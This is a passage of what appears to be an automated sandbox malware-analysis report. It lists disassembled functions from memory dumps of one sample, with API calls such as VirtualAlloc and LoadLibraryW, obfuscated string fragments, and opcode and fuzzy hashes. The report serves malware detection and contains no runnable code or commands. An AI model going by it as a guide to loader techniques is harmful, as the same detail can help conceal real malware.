                                • Opcode ID: 29c97412f184147f3501c4df9ab9ceaf2f4dfed6bea7654bb0d8064f28433938
                                • Instruction ID: 8c7027c58cbfed0e3e75eed80786482835e7b1e409138d3bdabcf6983b8377fb
                                • Opcode Fuzzy Hash: 29c97412f184147f3501c4df9ab9ceaf2f4dfed6bea7654bb0d8064f28433938
                                • Instruction Fuzzy Hash: A212D7A1D142A89AF720CA24DC44BAAB779FF91310F0481FAD44DA7684D67E4FC5CF62
                                Function 029266C7 Relevance: 39.4, APIs: 1, Strings: 25, Instructions: 447COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
                                • Opcode ID: 21e6af293b90cc5842f28fbf4448fc108141afab4e0ba87bbc0425a1281bf999
                                • Instruction ID: fb9e57fe04390d43c88352d1b02167b7909c3be95ec01227db7d36c8e76ff03b
                                • Opcode Fuzzy Hash: 21e6af293b90cc5842f28fbf4448fc108141afab4e0ba87bbc0425a1281bf999
                                • Instruction Fuzzy Hash: 8802D5A1D142A89BF720CA24DC44BAAB779FF91314F0481FAD44CA7684D67E1FC58F62
                                Function 0296EB78 Relevance: 39.3, APIs: 1, Strings: 25, Instructions: 348memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$P$W$_Q$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 4275171209-3027466465
                                • Opcode ID: 8da3498c8f1cb218593b01caab40e5b19f40af05376991f8f606b1d6be9f2401
                                • Instruction ID: e3367b3cabd6d516aa7f7309cc18f3fb569a0b02f402a6b0eaa78b550f1d6d33
                                • Opcode Fuzzy Hash: 8da3498c8f1cb218593b01caab40e5b19f40af05376991f8f606b1d6be9f2401
                                • Instruction Fuzzy Hash: FDD1F3B1D082689AF7248B24DC08BEABBB5EF91310F0441FAD44D67681D67E1BD5CF62
                                Function 029266CE Relevance: 37.9, APIs: 1, Strings: 24, Instructions: 444COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-205709743
                                • Opcode ID: 5c7baf28767c6873fed527441ffd970fc630bc7072725e030b00b4752a4e276d
                                • Instruction ID: 71c031122fb3a320ddbc2bd947ed58a8d2bab43ea680be7c06350d9c122a7c7c
                                • Opcode Fuzzy Hash: 5c7baf28767c6873fed527441ffd970fc630bc7072725e030b00b4752a4e276d
                                • Instruction Fuzzy Hash: E502E5A1D142A89BF720CA24DC44BAAB779FF91314F0481FAD44CA7684D67E4FC58F62
                                Function 0296E471 Relevance: 37.9, APIs: 1, Strings: 24, Instructions: 386memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 4275171209-410011414
                                • Opcode ID: 182c6189fca6c119df229ab6ed70959648d3e570d98d073a1c26de9ed7d5baad
                                • Instruction ID: cafa7bc3e66bc34fc41d5c2d42ed316afaad95d7dfbb6b71229e050349b55c6b
                                • Opcode Fuzzy Hash: 182c6189fca6c119df229ab6ed70959648d3e570d98d073a1c26de9ed7d5baad
                                • Instruction Fuzzy Hash: 04E117B5D08268CAE7208B24DC48BEABBB5EF85314F0480FAD54D67681D77A1BC5CF52
                                Function 0296EA75 Relevance: 37.8, APIs: 1, Strings: 24, Instructions: 325COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-410011414
                                • Opcode ID: 18644b29272693d5f5bb79a58307c37121743a1096aec5c7804e4401ac040275
                                • Instruction ID: 133fa52a8a16edac73658971090279c478a90a216bc2f0d96215a55e8c531fb7
                                • Opcode Fuzzy Hash: 18644b29272693d5f5bb79a58307c37121743a1096aec5c7804e4401ac040275
                                • Instruction Fuzzy Hash: E6C1F5B1C082A88AF7258A24DC58BEA7BB5EF81310F0441FED44E57281D77A1BD5CF62
                                Function 0296EABA Relevance: 37.8, APIs: 1, Strings: 24, Instructions: 305memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 4275171209-410011414
                                • Opcode ID: 13200580216242078bca658200621e23ef254a4dbb7c8e17f700551cf4bec2ef
                                • Instruction ID: d1947c83598b4c55a9dfcf8ee0ec7cf59577dc40c12b7e212d2d92a8b0329391
                                • Opcode Fuzzy Hash: 13200580216242078bca658200621e23ef254a4dbb7c8e17f700551cf4bec2ef
                                • Instruction Fuzzy Hash: 53C106B1C082A8DAF7258A24DC18BEA7AB5EF41310F0440FED44E57281D7BA1BD5CF62
                                Function 0296E6E5 Relevance: 37.8, APIs: 1, Strings: 24, Instructions: 253COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-410011414
                                • Opcode ID: ba7fa7033a36338fb45276b8759ac2abcf85794b8e79795e9708f1f89aba7c7c
                                • Instruction ID: 4f310186dbb530bba6b646c2b03183b2ec56052c5b9ba7702f745154faa94dab
                                • Opcode Fuzzy Hash: ba7fa7033a36338fb45276b8759ac2abcf85794b8e79795e9708f1f89aba7c7c
                                • Instruction Fuzzy Hash: 97A108B1D082A8DAF7218624DC18BEA7AB6EF81314F0440F9D44D67681D7BE0BD5CF62
                                Function 02923E2C Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 268COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: 6:56$=K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-3897388640
                                • Opcode ID: 48219afa09704ccbb10ad32ab13d15c1bfd92d96a3e3d68ad333b473432f9185
                                • Instruction ID: 2d00f492d39d56a4fd473d5c50f77457e87159b6fdadb43db629e364b565ddee
                                • Opcode Fuzzy Hash: 48219afa09704ccbb10ad32ab13d15c1bfd92d96a3e3d68ad333b473432f9185
                                • Instruction Fuzzy Hash: C9A105A1D056A48BFB258B24CC54BAA7B79FF91310F0440F9C44DA7285DB399BC9CF62
                                Function 02941290 Relevance: 28.6, APIs: 1, Strings: 15, Instructions: 561COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 84F=$P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-1945703278
                                • Opcode ID: fd65f5f726f44ad746631f01a31276a42a2aa6453a320fbbf9a988918caf193b
                                • Instruction ID: c562cb078df3b81fefd67026c771a1e6f242f55992ebcb370cbe2bb230699dc6
                                • Opcode Fuzzy Hash: fd65f5f726f44ad746631f01a31276a42a2aa6453a320fbbf9a988918caf193b
                                • Instruction Fuzzy Hash: F332BEB1E042688FEB24CB24DC44BEABB75AF85304F0481EAC84D67681DB795EC5CF52
                                Function 0294160A Relevance: 28.5, APIs: 1, Strings: 15, Instructions: 451COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 84F=$P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-1945703278
                                • Opcode ID: 402afd742cfd550e9115df9701638e99d2de7c13726ce63e07bbdc3fe4f16eb3
                                • Instruction ID: cced7289121090572d885c776a047acf9b70bd9e2792e15d29f0187525c614d0
                                • Opcode Fuzzy Hash: 402afd742cfd550e9115df9701638e99d2de7c13726ce63e07bbdc3fe4f16eb3
                                • Instruction Fuzzy Hash: 2B02E3B2D082A89EF7208A24DC44BEABB75EF81314F0441FAD44D67681DB795EC5CF62
                                Function 02941885 Relevance: 28.4, APIs: 1, Strings: 15, Instructions: 420COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: GM@$P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-1763701335
                                • Opcode ID: 6b62471c4ccdb41a55feed8a6db29f9cbd6f9d7952808055c243aa6eed3020b8
                                • Instruction ID: ecfe5a7506fdbf87f913f2fe9f298bf95dc4027efc8a4baae5df038e182510fb
                                • Opcode Fuzzy Hash: 6b62471c4ccdb41a55feed8a6db29f9cbd6f9d7952808055c243aa6eed3020b8
                                • Instruction Fuzzy Hash: 95F1F4B2D082A89AF7208B24DC44BEABB75EF81314F0441FAD44D67281DB795EC5CF66
                                Function 02923E3F Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 330COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: 1c39dbc066e9a7f69074b5ed89bbd19c88bee25a20dd18026d84eab13b275845
                                • Instruction ID: dc7868d0583dbf4d231ebec2ccfec676b1fd46b584bd677ad20e7b4bf50a0e02
                                • Opcode Fuzzy Hash: 1c39dbc066e9a7f69074b5ed89bbd19c88bee25a20dd18026d84eab13b275845
                                • Instruction Fuzzy Hash: 55D1E3A2E056648BE7248B24DC44BEA7B79FF91310F0440F9C44DA7245D7799BC9CF62
                                Function 0292445D Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 285libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: d30453edca430401de169f06a1505b3bec133e94d18f18db10041e26839fd97a
                                • Instruction ID: 039a85c7d3beb4861e56d4ed4c7c7bc0eea54f5b73ea54c9613dad6f78a0c6d1
                                • Opcode Fuzzy Hash: d30453edca430401de169f06a1505b3bec133e94d18f18db10041e26839fd97a
                                • Instruction Fuzzy Hash: C4B107A2E056648BFB218B24CC44BEA7B79EF81310F0540F9D44C97285DA799FC5CF62
                                Function 02924201 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 283libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: 9d57368b1bda871436802509e07980821e29f18371baa2b6fcdd426cf690496d
                                • Instruction ID: 4d18db4ab584c95f33f3891c1c7430c4bcca207f92a1e6d729a1fcc457487e9e
                                • Opcode Fuzzy Hash: 9d57368b1bda871436802509e07980821e29f18371baa2b6fcdd426cf690496d
                                • Instruction Fuzzy Hash: E5B106A2E056648BFB258B24CC44BEA7B79EF81310F0540F9D44C97285DA799FC5CF62
                                Function 02924045 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 280libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: 589c9e847aff5695281b04bf6c69ef88ac25404ebb1ed56094368f5b23f0dabb
                                • Instruction ID: bc2d15ab77ed343bc4f94958561871fbae71a5d1a67811ab33814bfc91fe3ef5
                                • Opcode Fuzzy Hash: 589c9e847aff5695281b04bf6c69ef88ac25404ebb1ed56094368f5b23f0dabb
                                • Instruction Fuzzy Hash: 9FB106A1D056A48BFB258B24CC54BEA7B79EF81310F0440F9C44DA7285DB399BC9CF62
                                Function 0292481E Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 270libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: f88637b7eceef5aa7b06ec676a11ac382dec015a9d75ac7695e668e870014a50
                                • Instruction ID: eb0fd18eeabffa8b85fd9eac312f776afe5c34d7dcf6731e09e00b99260d6068
                                • Opcode Fuzzy Hash: f88637b7eceef5aa7b06ec676a11ac382dec015a9d75ac7695e668e870014a50
                                • Instruction Fuzzy Hash: 6CB1E4A1D056A48FFB25CB24CC44BAABB79EF91310F0480F9C44DA7285D6799BC5CF62
                                Function 02924650 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 261libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: 5c787cc965b3e7646f45fc7b25f990efe3c9b0649a56c8e93baf4efea3c884d4
                                • Instruction ID: 48e5c740b92ca8130194207ac05fbffe983239deb16aafe274b5eeacf7602f0e
                                • Opcode Fuzzy Hash: 5c787cc965b3e7646f45fc7b25f990efe3c9b0649a56c8e93baf4efea3c884d4
                                • Instruction Fuzzy Hash: 66B1E4A1D056A88BFB258B24CC44BAA7B79FF91310F0480F9C44DA7285D7799BC5CF61
                                Function 029240BB Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 253libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: 91a86adeb094fed9daf9a2262d29c2fca819dea8b95ae2b7841f9d37d9b99813
                                • Instruction ID: 94b64b4933db86ff9da88f45c51455ab3ab18ee1f728e65cdb47a47e93d33dbf
                                • Opcode Fuzzy Hash: 91a86adeb094fed9daf9a2262d29c2fca819dea8b95ae2b7841f9d37d9b99813
                                • Instruction Fuzzy Hash: 82A116A1D056A48BFB258B24CC44BEA7B79EF91310F0440F9C44D97286D6799BC9CF62
                                Function 029248D5 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 250libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: 9325bd20c19b4b8037bf033c9d02466c6b93b5a953fd28c4c969f0f77893d3b0
                                • Instruction ID: 9c7292feca9edf33c31d6b115790b15199810b4ae92e74bd21d572c95933e17c
                                • Opcode Fuzzy Hash: 9325bd20c19b4b8037bf033c9d02466c6b93b5a953fd28c4c969f0f77893d3b0
                                • Instruction Fuzzy Hash: 7FA1D2A1D056A88BEB258B24CC44BAABB79EF91310F0481E9C44DA7285D7399BC5CF61
                                Function 029248EE Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 243libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: 3bb5d3526a3ae40a05d69a32edbadc3895aa2728f440d3cc052842b2f8825207
                                • Instruction ID: 03acac1620e6a5da9682dd90b87a6d5dd47ee4ab01ed73c579d1c82eed752330
                                • Opcode Fuzzy Hash: 3bb5d3526a3ae40a05d69a32edbadc3895aa2728f440d3cc052842b2f8825207
                                • Instruction Fuzzy Hash: ADA1F3A1D056A88FEB258B24CC44BAABB75FF91310F0441F9C44DA7285DB399BC9CF61
                                Function 02924C17 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 226libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                • Opcode ID: e00d0efe57f5aab2611af552d392a213ed3ae26b1f8ca27a54da6857cc700477
                                • Instruction ID: a90984ea1479b8f6a64cbc81225a9e4688392a4ae1b8679bbbd03b5dc91c34b5
                                • Opcode Fuzzy Hash: e00d0efe57f5aab2611af552d392a213ed3ae26b1f8ca27a54da6857cc700477
                                • Instruction Fuzzy Hash: D291D5A1D056A88BEB25CB24CC44BAABB75FF91300F0541E9C44CA7285DB799FC5CF62
                                Function 02941999 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 488COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: d75ae0188fda02d5a8e969d8a9f16fc8c6414fd2490c03c4815946dcda8fe144
                                • Instruction ID: 15d6d4c915c7b905a2a3d817788443caa3cb8f27143f4d51636a3424cc196129
                                • Opcode Fuzzy Hash: d75ae0188fda02d5a8e969d8a9f16fc8c6414fd2490c03c4815946dcda8fe144
                                • Instruction Fuzzy Hash: D41204B1D082689AEB208B24DC44BEABB75EF81314F0481FAD44D67281DB795EC5CF66
                                Function 029418C1 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 476COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 5e4b567ae07480e2866bf7b4d8144a45783ff58cc8a3586b7604b010338701a1
                                • Instruction ID: d3185e396cb5ac698a6ca32610834167a0e61ae04ce4fe80a7c581460b93c2b0
                                • Opcode Fuzzy Hash: 5e4b567ae07480e2866bf7b4d8144a45783ff58cc8a3586b7604b010338701a1
                                • Instruction Fuzzy Hash: CC1214B1D082689EEB208B24DC44BEABB75EF81314F0481FAD44D67281DB795EC5CF66
                                Function 029417AD Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 475COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: d84a930c45eaf047884eec37005c310144395b7f771a626c4af6fead5b0126d0
                                • Instruction ID: 5af16d77ca31bdb5d7a89565a4f11c7422219ac78f224d50e1e201b39f35b0c5
                                • Opcode Fuzzy Hash: d84a930c45eaf047884eec37005c310144395b7f771a626c4af6fead5b0126d0
                                • Instruction Fuzzy Hash: 5A1203B1D082689EEB208B24DC44BEABB75EF81304F0481FAC44D67281DB795EC5CF66
                                Function 029417B2 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 474COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: cd39bcf675c26a4d72469f76ab40ec906b91395a8140d685edfbe2babe0d753e
                                • Instruction ID: 29777e7f35b130399874199418ee94327332e3c10b99847f74b85636f05c776d
                                • Opcode Fuzzy Hash: cd39bcf675c26a4d72469f76ab40ec906b91395a8140d685edfbe2babe0d753e
                                • Instruction Fuzzy Hash: 6202F3B1D082689AEB208B24DC44BEABB75EF85304F0481FAD44D67281DB795EC5CF66
                                Function 029417A7 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 467COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: bb11b52a2905220d9c56f4a293b90fda9f066ec4125b68dc9bc56eee1f7f0c91
                                • Instruction ID: a43b97494ace4fbbfed81de791866768e5da9b3ce8642cfed3e8661d7096c335
                                • Opcode Fuzzy Hash: bb11b52a2905220d9c56f4a293b90fda9f066ec4125b68dc9bc56eee1f7f0c91
                                • Instruction Fuzzy Hash: 5C0205B1D082689AE7208B24DC44BEABB75EF81304F0481FAC44D67281DB795EC5CF66
                                Function 029417F4 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 459COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: cd80ac4dae92b1cdacedb59ae4fb9fa41c76178b56c295caaa4b6099eae57382
                                • Instruction ID: 74b2a06d444e36e587a5c7fb1a59f60aedfd5c5523f1058d1e3d6a5c8c5b6325
                                • Opcode Fuzzy Hash: cd80ac4dae92b1cdacedb59ae4fb9fa41c76178b56c295caaa4b6099eae57382
                                • Instruction Fuzzy Hash: 1B0204B1D082A89EEB208B24DC44BEABB75EF81314F0441FAC44D67281DB795EC5CF66
                                Function 02941914 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 407COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
